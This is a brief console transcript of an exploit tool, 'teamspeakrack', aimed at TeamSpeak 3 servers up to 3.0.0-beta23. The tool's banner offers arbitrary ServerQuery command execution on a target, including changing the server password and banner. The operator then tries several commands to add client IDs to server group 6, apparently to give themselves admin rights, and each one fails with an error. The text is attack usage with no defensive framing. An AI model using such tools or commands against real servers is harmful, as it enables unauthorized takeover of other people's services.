C:\>teamspeakrack 1 5005

TeamSpeak 3 <= 3.0.0-beta23 multiple vulnerabilities 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

- target : 5005
- now you can send and test any command you desire
- refer to doc\ts3_serverquery_manual.pdf for details and notes!
- use the command "virtualserver" for a list of virtualserver parameters to
change through the "serveredit" command (password, banner and so on)

> serveraddgroupclient sgid=6 cldbid=8
..- 47 error id=256 msg=command\snot\sfound
> servergroupaddclient sgid=6 cldbid=8
..- 47 error id=2560 msg=invalid\sgroup\sID
> servergroupaddclient sgid=6 cldbid=238
..- 47 error id=2560 msg=invalid\sgroup\sID
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